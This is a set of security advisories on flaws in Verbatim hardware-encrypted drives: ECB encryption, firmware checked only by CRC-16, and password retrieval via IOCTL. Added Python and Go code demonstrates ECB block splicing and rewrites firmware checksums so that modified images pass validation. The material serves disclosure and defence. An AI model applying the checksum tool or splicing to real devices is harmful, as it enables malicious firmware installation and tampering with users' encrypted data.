2022-01-27: Vulnerability reported to manufacturer
2022-02-11: Vulnerability reported to manufacturer again
2022-03-07: Vulnerability reported to manufacturer again
2022-06-08: Public release of security advisory



References:

[1] Product website for Verbatim Keypad Secure

https://www.verbatim-europe.co.uk/en/prod/verbatim-keypad-secure-usb-32-gen-1-drive-64gb-49428/#
[2] GitHub repository of flashrom
https://github.com/flashrom/flashrom
[3] SySS Security Advisory SYSS-2022-003

https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2022-003.txt
[4] SySS GmbH, SySS Responsible Disclosure Policy
https://www.syss.de/en/responsible-disclosure-policy



Credits:

This security vulnerability was found by Matthias Deeg of SySS GmbH.

E-Mail: matthias.deeg (at) syss.de
Public Key: 
https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Matthias_Deeg.asc

Key fingerprint = D1F0 A035 F06C E675 CDB9 0514 D9A4 BF6A 34AD 4DAB



Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may

[FD] [SYSS-2022-006]: Verbatim Store 'n' Go Secure Portable HDD - Use of a Cryptographic Primitive with a Risky Implementation (CWE-1240) (CVE-2022-28382)

2022-06-11 Thread Matthias Deeg

Advisory ID:               SYSS-2022-006
Product:                   Store 'n' Go Secure Portable HDD
Manufacturer:              Verbatim
Affected Version(s):       GD25LK01-3637-C VER4.0
Tested Version(s):         GD25LK01-3637-C VER4.0
Vulnerability Type:        Use of a Cryptographic Primitive with a Risky
                           Implementation (CWE-1240)
Risk Level:                Low
Solution Status:           Open
Manufacturer Notification: 2022-01-31
Solution Date:             -
Public Disclosure:         2022-06-08
CVE Reference:             CVE-2022-28382
Author of Advisory:        Matthias Deeg (SySS GmbH)



Overview:

The Verbatim Store 'n' Go Secure Portable HDD is a portable USB drive
with AES 256-bit hardware encryption and a built-in keypad for passcode
entry.

The manufacturer describes the product as follows:

"The AES 256-bit Hardware Encryption seamlessly encrypts all data on the
drive in real-time with a built-in keypad for password input. The SSD
does not store passwords in the computer or system's volatile memory
making it far more secure than software encryption. Also, if it falls
into the wrong hands, the SSD will lock and require re-formatting after
20 failed password attempts."[1]

Due to the use of the insecure AES mode of operation ECB (Electronic
Codebook), an attacker may be able to extract information from encrypted
data, for example by observing repeating byte patterns.



Vulnerability Details:

When analyzing the external SSD Verbatim Store 'n' Go Secure Portable
HDD, Matthias Deeg found out that the firmware of the USB-to-SATA bridge
controller INIC-3637EN uses AES-256 with the ECB (Electronic Codebook)
mode.

In this mode of operation, a block cipher like AES always encrypts
identical plaintext blocks, in this case 16-byte blocks, to identical
ciphertext blocks under the same key.

For some data, for instance bitmap images, this determinism (ECB
provides no diffusion across blocks, so the block structure of the
plaintext is preserved in the ciphertext) can leak sensitive information
even from encrypted data.

One famous example for this is an ECB-encrypted image of the TUX
penguin, which, for instance, is referenced in the Wikipedia article
about block cipher modes of operation[2] to illustrate this issue.

Thus, the use of the ECB operation mode can put the confidentiality of
specific information at risk, even in an encrypted form.

Additionally, in attack scenarios where an attacker has short-time
physical access to a Verbatim Store 'n' Go Secure Portable HDD and
later returns it to its legitimate owner, the attacker may be able to
compromise the integrity of the stored data without knowing the key:
because identical 16-byte plaintext blocks result in identical 16-byte
ciphertext blocks, specific encrypted 16-byte blocks can be replaced
with other encrypted blocks from the drive.



Proof of Concept (PoC):

The same 16 byte long plaintext pattern was written several times to an
unlocked Verbatim Store 'n' Go Secure Portable HDD.

When the SSD was then read using another SSD enclosure, the same 16
byte long ciphertext pattern could be observed for the corresponding
plaintext data.
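The PoC above, and the identical ones in SYSS-2022-015 and SYSS-2022-002, observe the ECB property from outside the device: write one 16-byte pattern repeatedly, read the raw sectors through another enclosure, and look for repeated ciphertext blocks. The Python below is an added example, not SySS's or Verbatim's code, that reproduces that observation and the block-replacement attack described in the Vulnerability Details of those three advisories. Because ECB's weakness is a property of the mode and not of the cipher, a small Feistel toy cipher (constructed here, not AES, not secure) stands in for the INIC-3637EN's AES-256 engine; the ECB and CBC wrappers, the repeated-block detector and the splice function are the example's own, and the key and pattern are constructed test data.

```python
import hashlib
from collections import defaultdict

BLOCK = 16  # AES block size; ECB's weakness is a property of the mode, not of the cipher


# --- Toy 16-byte Feistel block cipher: a constructed stand-in for the drive's AES-256
# --- engine. It is NOT AES and NOT secure; it only has to be a keyed permutation so
# --- that the mode-level behaviour shown below is faithful.
def _f(half: bytes, key: bytes, rnd: int) -> bytes:
    return hashlib.sha256(key + bytes([rnd]) + half).digest()[:8]


def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def encrypt_block(key: bytes, block: bytes) -> bytes:
    left, right = block[:8], block[8:]
    for rnd in range(4):
        left, right = right, _xor(left, _f(right, key, rnd))
    return left + right


def decrypt_block(key: bytes, block: bytes) -> bytes:
    left, right = block[:8], block[8:]
    for rnd in reversed(range(4)):
        left, right = _xor(right, _f(left, key, rnd)), left
    return left + right


def _blocks(data: bytes) -> list:
    if len(data) % BLOCK:
        raise ValueError("sector data must be a whole number of 16-byte blocks")
    return [data[i:i + BLOCK] for i in range(0, len(data), BLOCK)]


# --- ECB as used by the INIC-3637EN firmware: every block is encrypted independently
def ecb_encrypt(key: bytes, data: bytes) -> bytes:
    return b"".join(encrypt_block(key, b) for b in _blocks(data))


def ecb_decrypt(key: bytes, data: bytes) -> bytes:
    return b"".join(decrypt_block(key, b) for b in _blocks(data))


# --- CBC for contrast: chaining makes equal plaintext blocks encrypt differently
def cbc_encrypt(key: bytes, iv: bytes, data: bytes) -> bytes:
    out, prev = [], iv
    for b in _blocks(data):
        prev = encrypt_block(key, _xor(b, prev))
        out.append(prev)
    return b"".join(out)


def cbc_decrypt(key: bytes, iv: bytes, data: bytes) -> bytes:
    out, prev = [], iv
    for c in _blocks(data):
        out.append(_xor(decrypt_block(key, c), prev))
        prev = c
    return b"".join(out)


def repeated_blocks(ciphertext: bytes) -> dict:
    """What the PoC observed through a second enclosure: ciphertext blocks that occur
    more than once, mapped to their block indices. Non-empty under ECB, empty under CBC."""
    seen = defaultdict(list)
    for idx, blk in enumerate(_blocks(ciphertext)):
        seen[blk].append(idx)
    return {blk: idxs for blk, idxs in seen.items() if len(idxs) > 1}


def splice_block(ciphertext: bytes, src: int, dst: int) -> bytes:
    """The integrity attack from the advisories: copy ciphertext block `src` over block
    `dst`. Under ECB the drive later decrypts `dst` to the plaintext of `src`, with no
    key and no error, because nothing ties a block to its position."""
    blocks = _blocks(ciphertext)
    blocks[dst] = blocks[src]
    return b"".join(blocks)


if __name__ == "__main__":
    key = bytes(range(32))                  # constructed 256-bit key
    pattern = b"SECRET-PATTERN!!" * 8       # one 16-byte pattern written 8 times, as in the PoC
    ecb_ct = ecb_encrypt(key, pattern)
    print("ECB repeats:", {b.hex(): i for b, i in repeated_blocks(ecb_ct).items()})
    print("CBC repeats:", repeated_blocks(cbc_encrypt(key, bytes(16), pattern)))
    ct = ecb_encrypt(key, b"A" * 16 + b"B" * 16 + b"C" * 16)
    print("after splice:", ecb_decrypt(key, splice_block(ct, 0, 2)))
```

The detector is also a practical test for any "hardware encrypted" drive: write a sector full of one repeating 16-byte block, read the raw medium back through a plain enclosure, and run repeated_blocks over it. A disk-encryption mode designed for sector storage (XTS, or at least CBC with per-sector IVs) yields no repeats; ECB yields one repeated block per sector.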



Solution:

SySS GmbH is not aware of a solution for the described security issue.



Disclosure Timeline:

2022-01-31: Vulnerability reported to manufacturer
2022-02-11: Vulnerability reported to manufacturer again
2022-03-07: Vulnerability reported to manufacturer again
2022-06-08: Public release of security advisory



References:

[1] Product website for Verbatim Store 'n' Go Secure Portable HDD

https://www.verbatim-europe.co.uk/en/prod/store-n-go-portable-ssd-with-keypad-access-256gb-53402/
[2] Wikipedia article about block cipher mode of operation

https://en.wikipedia.org/wiki/Block_cipher_mode_of_operation#Electronic_codebook_(ECB)
[3] SySS Security Advisory SYSS-2022-006

https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2022-006.txt
[4] SySS GmbH, SySS Responsible Disclosure Policy
https://www.syss.de/en/responsible-disclosure-policy



Credits:

This security vulnerability was found by Matthias Deeg of SySS GmbH.

E-Mail: matthias.deeg (at) syss.de
Public Key: 
https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Matthias_Deeg.asc

Key fingerprint = D1F0 A035 F06C E675 CDB9 0514 D9A4 BF6A 34AD 4DAB



Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated

[FD] [SYSS-2022-007]: Verbatim Store 'n' Go Secure Portable HDD - Missing Immutable Root of Trust in Hardware (CWE-1326) (CVE-2022-28383)

2022-06-11 Thread Matthias Deeg

Advisory ID:               SYSS-2022-007
Product:                   Store 'n' Go Secure Portable HDD
Manufacturer:              Verbatim
Affected Version(s):       GD25LK01-3637-C VER4.0
Tested Version(s):         GD25LK01-3637-C VER4.0
Vulnerability Type:        Missing Immutable Root of Trust in Hardware
                           (CWE-1326)
Risk Level:                Medium
Solution Status:           Open
Manufacturer Notification: 2022-01-31
Solution Date:             -
Public Disclosure:         2022-06-08
CVE Reference:             CVE-2022-28383
Author of Advisory:        Matthias Deeg (SySS GmbH)



Overview:

The Verbatim Store 'n' Go Secure Portable HDD is a portable USB drive
with AES 256-bit hardware encryption and a built-in keypad for passcode
entry.

The manufacturer describes the product as follows:

"The AES 256-bit Hardware Encryption seamlessly encrypts all data on the
drive in real-time with a built-in keypad for password input. The SSD
does not store passwords in the computer or system's volatile memory
making it far more secure than software encryption. Also, if it falls
into the wrong hands, the SSD will lock and require re-formatting after
20 failed password attempts."[1]

Due to insufficient firmware validation, an attacker can store
malicious firmware code for the USB-to-SATA bridge controller on the
external drive which gets executed.



Vulnerability Details:

When analyzing the external SSD Verbatim Store 'n' Go Secure Portable
HDD, Matthias Deeg found out that the validation of the firmware for the
USB-to-SATA bridge controller INIC-3637EN only consists of a simple
CRC-16 check (XMODEM CRC-16).

Thus, an attacker is able to store malicious firmware code for the
INIC-3637EN with a correct checksum on the used SPI flash memory chip
(XT25F01D), which then gets successfully executed by the USB-to-SATA
bridge controller.

For instance, this security vulnerability could be exploited in a
so-called "supply chain attack" when the device is still on its way to
its legitimate user.

An attacker with temporary physical access while the device is in the
supply chain could, for example, program a modified firmware onto the
Verbatim Store 'n' Go Secure Portable HDD which always uses an
attacker-controlled AES key for the data encryption.

If, later on, the attacker gains access to the used USB drive, he
can simply decrypt all contained user data.



Proof of Concept (PoC):

SySS was able to read and write the SPI flash memory containing the
firmware of the INIC-3637EN controller (128 KB) using a universal
programmer.

By analyzing the dumped memory content, SySS found out that the
INIC-3637EN firmware is stored from the file offset 0x4000 to the file
offset 0x1BFFB, and that the corresponding XMODEM CRC-16 is stored at
the file offset 0x1FFFC.

Matthias Deeg developed a simple Python tool for updating the checksum
of modified firmware images before writing them to the SPI flash memory
chip.

The following output exemplarily shows updating a modified firmware
image:

$ python update-firmaware.py firmware_hacked.bin
Verbatim Store 'n' Go Firmware Updater v0.1 - Matthias Deeg, SySS GmbH 
(c) 2022

[*] Computed CRC-16 (0x03F5) does not match stored CRC-16 (0x8B17).
[*] Successfully updated firmware file
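The PoC sections of SYSS-2022-011, SYSS-2022-003 and this advisory (SYSS-2022-007) all rest on the same fact: the only thing the INIC-3637EN checks before running a firmware image is a CRC-16/XMODEM over the region 0x4000..0x1BFFB, stored at 0x1FFFC of the 128 KB SPI flash dump. The Python below is an added example, not the SySS tool whose output is shown above and not Verbatim's or Initio's code: it implements that checksum, verifies a dump the way the controller does, and rewrites the stored value after a modification. The offsets come from the advisories; the byte order of the stored checksum is not stated there and is an assumption exposed as CRC_BYTEORDER; the sample image is constructed filler, not real firmware.

```python
import sys

# Layout stated in the SySS advisories for the 128 KB SPI flash dump (XT25F01D)
IMAGE_SIZE = 0x20000
FW_START = 0x4000        # first byte covered by the checksum
FW_END = 0x1BFFB + 1     # exclusive end: the advisories give 0x1BFFB as the last covered byte
CRC_OFFSET = 0x1FFFC     # where the 16-bit checksum is stored
CRC_BYTEORDER = "big"    # ASSUMPTION: the advisories do not state the byte order of the stored CRC

# CRC-16/XMODEM: poly 0x1021, init 0x0000, no reflection, no final XOR.
# Standard check value: crc16_xmodem(b"123456789") == 0x31C3
_TABLE = []
for _b in range(256):
    _c = _b << 8
    for _ in range(8):
        _c = ((_c << 1) ^ 0x1021) & 0xFFFF if _c & 0x8000 else (_c << 1) & 0xFFFF
    _TABLE.append(_c)


def crc16_xmodem(data: bytes) -> int:
    crc = 0
    for byte in data:
        crc = ((crc << 8) & 0xFFFF) ^ _TABLE[((crc >> 8) ^ byte) & 0xFF]
    return crc


def image_crc(image: bytes) -> int:
    """Checksum over the firmware region, exactly what the bridge controller recomputes."""
    return crc16_xmodem(image[FW_START:FW_END])


def stored_crc(image: bytes) -> int:
    return int.from_bytes(image[CRC_OFFSET:CRC_OFFSET + 2], CRC_BYTEORDER)


def verify_image(image: bytes) -> bool:
    """The only integrity check the controller performs: computed CRC equals stored CRC.
    A CRC is an error-detection code, not a signature, so anyone can satisfy it."""
    return len(image) == IMAGE_SIZE and image_crc(image) == stored_crc(image)


def update_crc(image: bytearray):
    """Rewrite the stored CRC after the firmware region was modified; returns (old, new)."""
    old, new = stored_crc(image), image_crc(image)
    image[CRC_OFFSET:CRC_OFFSET + 2] = new.to_bytes(2, CRC_BYTEORDER)
    return old, new


def make_sample_image() -> bytearray:
    """Constructed 128 KB image with deterministic filler in the firmware region (not real
    firmware) and a matching checksum, i.e. what a pristine dump looks like to the controller."""
    image = bytearray(IMAGE_SIZE)
    for i in range(FW_START, FW_END):
        image[i] = (i * 7 + 3) & 0xFF
    update_crc(image)
    return image


def main(argv):
    if len(argv) != 2:
        print(f"usage: {argv[0]} <firmware_image.bin>")
        return 2
    with open(argv[1], "rb") as fh:
        image = bytearray(fh.read())
    if len(image) != IMAGE_SIZE:
        print(f"[-] Expected a {IMAGE_SIZE} byte dump, got {len(image)} bytes")
        return 1
    if verify_image(image):
        print(f"[*] Stored CRC-16 (0x{stored_crc(image):04X}) matches computed CRC-16")
        return 0
    old, new = update_crc(image)
    print(f"[*] Computed CRC-16 (0x{new:04X}) does not match stored CRC-16 (0x{old:04X}).")
    with open(argv[1], "wb") as fh:
        fh.write(image)
    print("[*] Successfully updated firmware file")
    return 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

Run against a dump to check whether it is what the controller will accept; run against a modified dump to make it acceptable before writing it back with a programmer (the advisories used a universal programmer, SYSS-2022-003 also references flashrom). The point for defenders is the converse: because verify_image is all the hardware does, a CRC match says nothing about who produced the image, and only a signature verified against a key held in immutable hardware would.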



Solution:

SySS GmbH is not aware of a solution for the described security issue.



Disclosure Timeline:

2022-01-31: Vulnerability reported to manufacturer
2022-02-11: Vulnerability reported to manufacturer again
2022-03-07: Vulnerability reported to manufacturer again
2022-06-08: Public release of security advisory



References:

[1] Product website for Verbatim Store 'n' Go Secure Portable HDD

https://www.verbatim-europe.co.uk/en/prod/store-n-go-portable-ssd-with-keypad-access-256gb-53402/
[2] SySS Security Advisory SYSS-2022-007

https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2022-007.txt
[3] SySS GmbH, SySS Responsible Disclosure Policy
https://www.syss.de/en/responsible-disclosure-policy



Credits:

This security vulnerability was found by Matthias Deeg of SySS GmbH.

E-Mail: matthias.deeg (at) syss.de
Public Key: 
https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Matthias_Deeg.asc

Key fingerprint = D1F0 A035 F06C E675 CDB9 0514 D9A4 BF6A 34AD 4DAB



Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may

[FD] [SYSS-2022-009]: Verbatim Executive Fingerprint Secure SSD - Use of a Cryptographic Primitive with a Risky Implementation (CWE-1240) (CVE-2022-28387)

2022-06-11 Thread Matthias Deeg

Advisory ID:               SYSS-2022-009
Product:                   Executive Fingerprint Secure SSD
Manufacturer:              Verbatim
Affected Version(s):       GDMSFE01-INI3637-C VER1.1
Tested Version(s):         GDMSFE01-INI3637-C VER1.1
Vulnerability Type:        Use of a Cryptographic Primitive with a Risky
                           Implementation (CWE-1240)
Risk Level:                High
Solution Status:           Open
Manufacturer Notification: 2022-02-03
Solution Date:             -
Public Disclosure:         2022-06-08
CVE Reference:             CVE-2022-28387
Author of Advisory:        Matthias Deeg (SySS GmbH)



Overview:

The Verbatim Executive Fingerprint Secure SSD is a USB drive with AES
256-bit hardware encryption and a built-in fingerprint sensor for
unlocking the device with previously registered fingerprints.

The manufacturer describes the product as follows:

"The AES 256-bit Hardware Encryption seamlessly encrypts all data on the
drive in real-time. The drive is compliant with GDPR requirements as
100% of the drive is securely encrypted. The built-in fingerprint
recognition system allows access for up to eight authorised users and
one administrator who can access the device via a password. The SSD
does not store passwords in the computer or system's volatile memory
making it far more secure than software encryption."[1]

Due to an insecure design, the Verbatim Executive Fingerprint Secure SSD
can be unlocked by an attacker who can thus gain unauthorized access to
the stored data.



Vulnerability Details:

When analyzing the Verbatim Executive Fingerprint Secure SSD, Matthias
Deeg found out that it uses an insecure design which allows retrieving
the currently set password and thus unlocking the device and accessing
the stored data in an unauthorized way.

The Verbatim Executive Fingerprint Secure SSD consists of the following
five main parts:

1. An SSD in M.2 form factor
2. A USB-to-SATA bridge controller (INIC-3637EN)
3. An SPI flash memory chip (XT25F01D) containing the firmware of the
   INIC-3637EN
4. A fingerprint sensor
5. A fingerprint sensor controller (INIC-3782N)

For encrypting the data stored on the SSD, the hardware AES engine of
the INIC-3637EN is used. More specifically, AES-256 in ECB (Electronic
Codebook) mode is used for data encryption, which is also a security
issue by itself, as described in the SySS security advisory
SYSS-2022-010[2].

The SSD can be unlocked either via the fingerprint sensor, using a
previously registered fingerprint, or via a password.

Unlocking the SSD via a password is done with Windows or macOS client
software that sends specific IOCTL commands (IOCTL_SCSI_PASS_THROUGH)
to the USB device.

The data part of those device-specific commands is encrypted using AES
with a hard-coded cryptographic key found within the client software
and the USB-to-SATA bridge controller's firmware.

One of the supported commands is able to retrieve the currently set
password and cryptographic key material used for the data disk
encryption.

By sending this specific IOCTL command to the USB device and knowing the
used AES encryption scheme for the command data, an attacker can
instantly retrieve the correct password and thus unlock the device in
order to gain unauthorized access to its stored data.



Proof of Concept (PoC):

For demonstrating the described security vulnerability, Matthias Deeg
developed a software tool that can extract the currently set password
of a Verbatim Executive Fingerprint Secure SSD. This enables an attacker
to instantly unlock the device.



Solution:

SySS GmbH is not aware of a solution for the described security issue.



Disclosure Timeline:

2022-02-03: Vulnerability reported to manufacturer
2022-02-11: Vulnerability reported to manufacturer again
2022-03-07: Vulnerability reported to manufacturer again
2022-06-08: Public release of security advisory



References:

[1] Product website for Verbatim Executive Fingerprint Secure SSD
    https://www.verbatim-europe.co.uk/en/prod/executive-fingerprint-secure-ssd-usb-32-gen-1--usb-c-1tb-53657/
[2] SySS Security Advisory SYSS-2022-010
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2022-010.txt
[3] SySS Security Advisory SYSS-2022-009
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2022-009.txt
[4] SySS GmbH, SySS Responsible Disclosure Policy
    https://www.syss.de/en/responsible-disclosure-policy



Credits:

This security vul

[FD] [SYSS-2022-014]: Verbatim Fingerprint Secure Portable Hard Drive - Use of a Cryptographic Primitive with a Risky Implementation (CWE-1240) (CVE-2022-28387)

2022-06-11 Thread Matthias Deeg

Advisory ID:               SYSS-2022-014
Product:                   Fingerprint Secure Portable Hard Drive
Manufacturer:              Verbatim
Affected Version(s):       #53650
Tested Version(s):         #53650
Vulnerability Type:        Use of a Cryptographic Primitive with a Risky
                           Implementation (CWE-1240)
Risk Level:                High
Solution Status:           Open
Manufacturer Notification: 2022-02-03
Solution Date:             -
Public Disclosure:         2022-06-08
CVE Reference:             CVE-2022-28387
Author of Advisory:        Matthias Deeg (SySS GmbH)



Overview:

The Verbatim Fingerprint Secure Portable Hard Drive is a USB drive with
AES 256-bit hardware encryption and a built-in fingerprint sensor for
unlocking the device with previously registered fingerprints.

The manufacturer describes the product as follows:

"The AES 256-bit Hardware Encryption seamlessly encrypts all data on the
drive in real-time. The drive is compliant with GDPR requirements as
100% of the drive is securely encrypted. The built-in fingerprint
recognition system allows access for up to eight authorised users and
one administrator who can access the device via a password. The hard
drive does not store passwords in the computer or system's volatile
memory making it far more secure than software encryption."[1]

Due to an insecure design, the Verbatim Fingerprint Secure Portable Hard
Drive can be unlocked by an attacker who can thus gain unauthorized
access to the stored data.



Vulnerability Details:

When analyzing the Verbatim Fingerprint Secure Portable Hard Drive,
Matthias Deeg found out that it uses an insecure design which allows an
attacker to retrieve the currently used password and thus to unlock and
access the stored data in an unauthorized way.

The Verbatim Fingerprint Secure Portable Hard Drive consists of the
following five main parts:

1. A hard drive (3.5 inch)
2. A USB-to-SATA bridge controller (INIC-3637EN)
3. An SPI flash memory chip (XT25F01B) containing the firmware of the
   INIC-3637EN
4. A fingerprint sensor
5. A fingerprint sensor controller (INIC-3782N)

For encrypting the data stored on the hard drive, the hardware AES
engine of the INIC-3637EN is used. More specifically, AES-256 in ECB
(Electronic Codebook) mode is used for data encryption, which is also a
security issue by itself, as described in the SySS security advisory
SYSS-2022-015[2].

The hard drive can be unlocked either via the fingerprint sensor, using
a previously registered fingerprint, or via a password.

Unlocking the hard drive via a password is done with Windows or macOS
client software that sends specific IOCTL commands
(IOCTL_SCSI_PASS_THROUGH) to the USB device.

The data part of those device-specific commands is encrypted using AES
with a hard-coded cryptographic key found within the client software
and the USB-to-SATA bridge controller's firmware.

One of the supported commands is able to retrieve the currently set
password and cryptographic key material used for the data disk
encryption.

By sending this specific IOCTL command to the USB device and knowing the
used AES encryption scheme for the command data, an attacker can
instantly retrieve the correct password and thus unlock the device in
order to gain unauthorized access to its stored data.



Proof of Concept (PoC):

For demonstrating the described security vulnerability, Matthias Deeg
developed a software tool that can extract the currently set password
of a Verbatim Fingerprint Secure Portable Hard Drive. This enables an
attacker to instantly unlock the device.



Solution:

SySS GmbH is not aware of a solution for the described security issue.



Disclosure Timeline:

2022-02-03: Vulnerability reported to manufacturer
2022-02-11: Vulnerability reported to manufacturer again
2022-03-07: Vulnerability reported to manufacturer again
2022-06-08: Public release of security advisory



References:

[1] Product website for Verbatim Fingerprint Secure Portable Hard Drive
    https://www.verbatim-europe.co.uk/en/prod/fingerprint-secure-portable-hard-drive-1tb-53650/
[2] SySS Security Advisory SYSS-2022-015
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2022-015.txt
[3] SySS Security Advisory SYSS-2022-014
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2022-014.txt
[4] SySS GmbH, SySS Responsible Disclosure Policy
    https://www.syss.de/en/responsible-disclosure-policy



Credits:

Thi

[FD] [SYSS-2022-016]: Verbatim Fingerprint Secure Portable Hard Drive - Missing Immutable Root of Trust in Hardware (CWE-1326) (CVE-2022-28383)

2022-06-11 Thread Matthias Deeg

Advisory ID:               SYSS-2022-016
Product:                   Fingerprint Secure Portable Hard Drive
Manufacturer:              Verbatim
Affected Version(s):       #53650
Tested Version(s):         #53650
Vulnerability Type:        Missing Immutable Root of Trust in Hardware
                           (CWE-1326)
Risk Level:                Medium
Solution Status:           Open
Manufacturer Notification: 2022-02-03
Solution Date:             -
Public Disclosure:         2022-06-08
CVE Reference:             CVE-2022-28383
Author of Advisory:        Matthias Deeg (SySS GmbH)



Overview:

The Verbatim Fingerprint Secure Portable Hard Drive is a USB drive with
AES 256-bit hardware encryption and a built-in fingerprint sensor for
unlocking the device with previously registered fingerprints.

The manufacturer describes the product as follows:

"The AES 256-bit Hardware Encryption seamlessly encrypts all data on the
drive in real-time. The drive is compliant with GDPR requirements as
100% of the drive is securely encrypted. The built-in fingerprint
recognition system allows access for up to eight authorised users and
one administrator who can access the device via a password. The hard
drive does not store passwords in the computer or system's volatile
memory making it far more secure than software encryption."[1]

Due to insufficient firmware validation, an attacker can store
malicious firmware code for the USB-to-SATA bridge controller on the USB
drive, which then gets executed.



Vulnerability Details:

When analyzing the Fingerprint Secure Portable Hard Drive, Matthias Deeg
found out that the validation of the firmware for the USB-to-SATA bridge
controller INIC-3637EN only consists of a simple CRC-16 check (XMODEM
CRC-16).

Thus, an attacker is able to store malicious firmware code for the
INIC-3637EN with a correct checksum on the used SPI flash memory chip
(XT25F01B), which then gets successfully executed by the USB-to-SATA
bridge controller.

For instance, this security vulnerability could be exploited in a
so-called "supply chain attack" when the device is still on its way to
its legitimate user.

An attacker with temporary physical access during the supply chain
could, for example, program a modified firmware onto the Verbatim
Fingerprint Secure Portable Hard Drive that always uses an
attacker-controlled AES key for the data encryption.

If, later on, the attacker gains access to the used USB drive, he can
simply decrypt all contained user data.



Proof of Concept (PoC):

SySS was able to read and write the SPI flash memory containing the
firmware of the INIC-3637EN controller (128 KB) using a universal
programmer.

By analyzing the dumped memory content, SySS found out that the
INIC-3637EN firmware is stored from the file offset 0x4000 to the file
offset 0x1BFFB, and that the corresponding XMODEM CRC-16 is stored at
the file offset 0x1FFFC.

Matthias Deeg developed a simple Python tool for updating the checksum
of modified firmware images before writing them to the SPI flash memory
chip.

The following output shows, as an example, the update of a modified
firmware image:

$ python update-firmaware.py firmware_hacked.bin
Verbatim Fingerprint Secure Portable Hard Drive Updater v0.1 - Matthias Deeg, SySS GmbH (c) 2022

[*] Computed CRC-16 (0x86DD) does not match stored CRC-16 (0x77FF).
[*] Successfully updated firmware file
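As an added example, not the SySS updater itself, the following Go program reproduces the XMODEM CRC-16 check over the region described above and shows why it cannot act as a root of trust: a recomputed CRC satisfies the controller's check on any firmware, while a keyed tag (HMAC-SHA256 standing in for a vendor signature) rejects modified firmware. Treating 0x1BFFB as inclusive and the stored CRC as little-endian are assumptions; the key and the image are constructed.

```go
package main

import (
	"bytes"
	"crypto/hmac"
	"crypto/sha256"
	"encoding/binary"
	"fmt"
)

// Layout from the advisory: 128 KB SPI flash dump, INIC-3637EN firmware from
// offset 0x4000 to 0x1BFFB, XMODEM CRC-16 at offset 0x1FFFC. Treating 0x1BFFB
// as inclusive and the CRC as little-endian are assumptions of this example.
const (
	imageSize = 128 * 1024
	fwStart   = 0x4000
	fwEnd     = 0x1BFFB // assumed inclusive
	crcOffset = 0x1FFFC
)

// crc16Xmodem: polynomial 0x1021, initial value 0, no reflection, no final
// XOR. The standard check value for "123456789" is 0x31C3.
func crc16Xmodem(data []byte) uint16 {
	var crc uint16
	for _, b := range data {
		crc ^= uint16(b) << 8
		for i := 0; i < 8; i++ {
			if crc&0x8000 != 0 {
				crc = crc<<1 ^ 0x1021
			} else {
				crc <<= 1
			}
		}
	}
	return crc
}

func checkSize(image []byte) error {
	if len(image) != imageSize {
		return fmt.Errorf("unexpected image size %d, want %d", len(image), imageSize)
	}
	return nil
}

// verifyCRC reproduces the only check the controller performs: the CRC over
// the firmware region must equal the value stored at crcOffset.
func verifyCRC(image []byte) (bool, error) {
	if err := checkSize(image); err != nil {
		return false, err
	}
	stored := binary.LittleEndian.Uint16(image[crcOffset:])
	return crc16Xmodem(image[fwStart:fwEnd+1]) == stored, nil
}

// stampCRC returns a copy of the image with a freshly computed CRC. No secret
// is involved, so the check cannot distinguish vendor firmware from any other.
func stampCRC(image []byte) ([]byte, error) {
	if err := checkSize(image); err != nil {
		return nil, err
	}
	out := append([]byte(nil), image...)
	binary.LittleEndian.PutUint16(out[crcOffset:], crc16Xmodem(out[fwStart:fwEnd+1]))
	return out, nil
}

// firmwareTag is what an authenticity check needs instead: a value only the
// holder of a secret can produce (here HMAC-SHA256 in place of a signature).
func firmwareTag(key, image []byte) ([]byte, error) {
	if err := checkSize(image); err != nil {
		return nil, err
	}
	mac := hmac.New(sha256.New, key)
	mac.Write(image[fwStart : fwEnd+1])
	return mac.Sum(nil), nil
}

// sampleImage is a constructed stand-in for a real dump: filler firmware plus
// a valid CRC.
func sampleImage() []byte {
	img := make([]byte, imageSize)
	copy(img[fwStart:], bytes.Repeat([]byte("FW"), (fwEnd-fwStart+1)/2))
	stamped, _ := stampCRC(img)
	return stamped
}

func main() {
	key := []byte("constructed-vendor-key") // placeholder, not a real key
	img := sampleImage()
	tag, _ := firmwareTag(key, img)
	modified := append([]byte(nil), img...)
	modified[fwStart+0x100] ^= 0xFF // one changed firmware byte
	ok, _ := verifyCRC(modified)
	fmt.Println("modified image passes CRC check:", ok) // false
	restamped, _ := stampCRC(modified)
	ok, _ = verifyCRC(restamped)
	fmt.Println("restamped image passes CRC check:", ok) // true
	got, _ := firmwareTag(key, restamped)
	fmt.Println("restamped image passes keyed check:", hmac.Equal(got, tag)) // false
}
```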



Solution:

SySS GmbH is not aware of a solution for the described security issue.



Disclosure Timeline:

2022-02-03: Vulnerability reported to manufacturer
2022-02-11: Vulnerability reported to manufacturer again
2022-03-07: Vulnerability reported to manufacturer again
2022-06-08: Public release of security advisory



References:

[1] Product website for Verbatim Fingerprint Secure Portable Hard Drive
    https://www.verbatim-europe.co.uk/en/prod/fingerprint-secure-portable-hard-drive-1tb-53650/
[2] SySS Security Advisory SYSS-2022-016
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2022-016.txt
[3] SySS GmbH, SySS Responsible Disclosure Policy
    https://www.syss.de/en/responsible-disclosure-policy



Credits:

This security vulnerability was found by Matthias Deeg of SySS GmbH.

E-Mail: matthias.deeg (at) syss.de
Public Key: 
https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Matthias_Deeg.asc

Key fingerprint = D1F0 A035 F06C E675 CDB9 0514 D9A4 BF6A 34AD 4DAB



Disclaimer:

The information provi

